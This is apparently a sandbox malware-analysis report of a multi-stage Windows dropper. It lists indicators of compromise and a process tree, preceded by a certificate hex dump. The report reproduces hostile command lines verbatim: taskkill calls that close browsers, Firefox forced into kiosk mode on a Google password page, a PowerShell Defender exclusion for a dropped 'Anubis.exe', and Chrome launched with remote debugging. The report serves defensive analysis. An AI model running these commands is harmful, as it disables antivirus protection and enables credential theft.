040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 5ad02b1c89.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 320 rapes.exe 1692 09870567f4.exe 1988 cdc919a8cd.exe 2060 e11988fb68.exe 632 5ad02b1c89.exe 632 5ad02b1c89.exe 632 5ad02b1c89.exe 632 5ad02b1c89.exe 632 5ad02b1c89.exe 880 25f1d18449.exe 2060 e11988fb68.exe 2060 e11988fb68.exe 2060 e11988fb68.exe 2060 e11988fb68.exe 2444 e222971673.exe 1940 2085eb7ce3.exe 2160 da4812e273.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 2160 da4812e273.exe 2160 da4812e273.exe 3264 ce4pMzk.exe 3264 ce4pMzk.exe 3264 ce4pMzk.exe 3264 ce4pMzk.exe 2200 FvbuInU.exe 3660 powershell.exe 2200 FvbuInU.exe 2200 FvbuInU.exe 2200 FvbuInU.exe 2200 FvbuInU.exe 296 SplashWin.exe 2352 SplashWin.exe 2352 SplashWin.exe 3488 mAtJWNv.exe 3488 mAtJWNv.exe 3488 mAtJWNv.exe 1780 chrome.exe 1780 chrome.exe 3768 cmd.exe 3768 cmd.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2352 SplashWin.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1948 9f62cbbc9c.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1136 taskkill.exe Token: SeDebugPrivilege 1660 firefox.exe Token: SeDebugPrivilege 1660 firefox.exe Token: SeDebugPrivilege 2160 da4812e273.exe Token: SeDebugPrivilege 3264 ce4pMzk.exe Token: SeDebugPrivilege 3660 powershell.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe Token: SeShutdownPrivilege 1780 chrome.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
pid Process 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1660 firefox.exe 1660 firefox.exe 1660 firefox.exe 1660 firefox.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe 1780 chrome.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1660 firefox.exe 1660 firefox.exe 1660 firefox.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe 1940 2085eb7ce3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2016 wrote to memory of 320 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 30 PID 2016 wrote to memory of 320 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 30 PID 2016 wrote to memory of 320 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 30 PID 2016 wrote to memory of 320 2016 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 30 PID 320 wrote to memory of 1692 320 rapes.exe 33 PID 320 wrote to memory of 1692 320 rapes.exe 33 PID 320 wrote to memory of 1692 320 rapes.exe 33 PID 320 wrote to memory of 1692 320 rapes.exe 33 PID 320 wrote to memory of 1948 320 rapes.exe 34 PID 320 wrote to memory of 1948 320 rapes.exe 34 PID 320 wrote to memory of 1948 320 rapes.exe 34 PID 320 wrote to memory of 1948 320 rapes.exe 34 PID 1948 wrote to memory of 1568 1948 9f62cbbc9c.exe 35 PID 1948 wrote to memory of 1568 1948 9f62cbbc9c.exe 35 PID 1948 wrote to memory of 1568 1948 9f62cbbc9c.exe 35 PID 1948 wrote to memory of 1568 1948 9f62cbbc9c.exe 35 PID 1948 wrote to memory of 1768 1948 9f62cbbc9c.exe 36 PID 1948 wrote to memory of 1768 1948 9f62cbbc9c.exe 36 PID 1948 wrote to memory of 1768 1948 9f62cbbc9c.exe 36 PID 1948 wrote to memory of 1768 1948 9f62cbbc9c.exe 36 PID 1948 wrote to memory of 2932 1948 9f62cbbc9c.exe 37 PID 1948 wrote to memory of 2932 1948 9f62cbbc9c.exe 37 PID 1948 wrote to memory of 2932 1948 9f62cbbc9c.exe 37 PID 1948 wrote to memory of 2932 1948 9f62cbbc9c.exe 37 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2900 1948 9f62cbbc9c.exe 38 PID 1948 wrote to memory of 2236 1948 9f62cbbc9c.exe 39 PID 1948 wrote to memory of 2236 1948 9f62cbbc9c.exe 39 PID 1948 wrote to memory of 2236 1948 9f62cbbc9c.exe 39 PID 1948 wrote to memory of 2236 1948 9f62cbbc9c.exe 39 PID 2900 wrote to memory of 1756 2900 9f62cbbc9c.exe 41 PID 2900 wrote to memory of 1756 2900 9f62cbbc9c.exe 41 PID 2900 wrote to memory of 1756 2900 9f62cbbc9c.exe 41 PID 2900 wrote to memory of 1756 2900 9f62cbbc9c.exe 41 PID 320 wrote to memory of 1988 320 rapes.exe 42 PID 320 wrote to memory of 1988 320 rapes.exe 42 PID 320 wrote to memory of 1988 320 rapes.exe 42 PID 320 wrote to memory of 1988 320 rapes.exe 42 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 1692 wrote to memory of 2188 1692 09870567f4.exe 43 PID 320 wrote to memory of 2060 320 rapes.exe 45 PID 320 wrote to memory of 2060 320 rapes.exe 45 PID 320 wrote to memory of 2060 320 rapes.exe 45 PID 320 wrote to memory of 2060 320 rapes.exe 45 PID 1988 wrote to memory of 2712 1988 cdc919a8cd.exe 46 PID 1988 wrote to memory of 2712 1988 cdc919a8cd.exe 46 PID 1988 wrote to memory of 2712 1988 cdc919a8cd.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe"C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Users\Admin\AppData\Local\Temp\10105330101\09870567f4.exe"C:\Users\Admin\AppData\Local\Temp\10105330101\09870567f4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"4⤵
- Executes dropped EXE
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"4⤵
- Executes dropped EXE
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"4⤵
- Executes dropped EXE
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\9f62cbbc9c.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 10205⤵
- Loads dropped DLL
- Program crash
PID:1756
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 5324⤵
- Loads dropped DLL
- Program crash
PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105350101\cdc919a8cd.exe"C:\Users\Admin\AppData\Local\Temp\10105350101\cdc919a8cd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105360101\e11988fb68.exe"C:\Users\Admin\AppData\Local\Temp\10105360101\e11988fb68.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\10105370101\5ad02b1c89.exe"C:\Users\Admin\AppData\Local\Temp\10105370101\5ad02b1c89.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:632
-
-
C:\Users\Admin\AppData\Local\Temp\10105380101\25f1d18449.exe"C:\Users\Admin\AppData\Local\Temp\10105380101\25f1d18449.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 11964⤵
- Loads dropped DLL
- Program crash
PID:2972
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105390101\e222971673.exe"C:\Users\Admin\AppData\Local\Temp\10105390101\e222971673.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
C:\Users\Admin\AppData\Local\Temp\10105400101\2085eb7ce3.exe"C:\Users\Admin\AppData\Local\Temp\10105400101\2085eb7ce3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1940 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1792
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1660 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.0.2048829060\1984221038" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1164 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec436664-800e-4386-93fe-f123558ac2f1} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 1320 fedbd58 gpu6⤵PID:556
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.1.1492828682\1235064593" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c5d2a291-18d6-45e3-affc-5b7def60e553} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 1548 e71258 socket6⤵PID:2524
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.2.60100122\1631051748" -childID 1 -isForBrowser -prefsHandle 2008 -prefMapHandle 2004 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f9d4d98-066d-4b1e-95e7-043e4630f699} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 2020 19594b58 tab6⤵PID:2408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.3.1833288621\1325151419" -childID 2 -isForBrowser -prefsHandle 2680 -prefMapHandle 2676 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4309c7d2-6bab-4dde-a13b-099df2c1f8d5} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 2696 16eceb58 tab6⤵PID:1592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.4.2105178535\1835544652" -childID 3 -isForBrowser -prefsHandle 3836 -prefMapHandle 3896 -prefsLen 26607 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a003cf8d-b27b-404c-8922-c5267dff3bb5} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 3928 20a03b58 tab6⤵PID:1392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.5.312517147\54357825" -childID 4 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26607 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ade796b-d4f9-4ba1-9df0-d98d878172c3} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 3956 20a06858 tab6⤵PID:2492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1660.6.949985114\509682875" -childID 5 -isForBrowser -prefsHandle 4120 -prefMapHandle 4116 -prefsLen 26607 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bb1b622-b09f-4341-b534-cc89a9f3067f} 1660 "\\.\pipe\gecko-crash-server-pipe.1660" 4132 20a04a58 tab6⤵PID:1348
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105410101\da4812e273.exe"C:\Users\Admin\AppData\Local\Temp\10105410101\da4812e273.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\FbCMn8UO\Anubis.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3408 -
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Executes dropped EXE
PID:3472
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Executes dropped EXE
PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3488 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1780 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1489758,0x7fef1489768,0x7fef14897786⤵PID:3720
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:3852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:26⤵PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:86⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:86⤵PID:3984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:3564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:1648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1252 --field-trial-handle=1224,i,15047040910037419503,9227143011945631675,131072 /prefetch:26⤵PID:2092
-
-
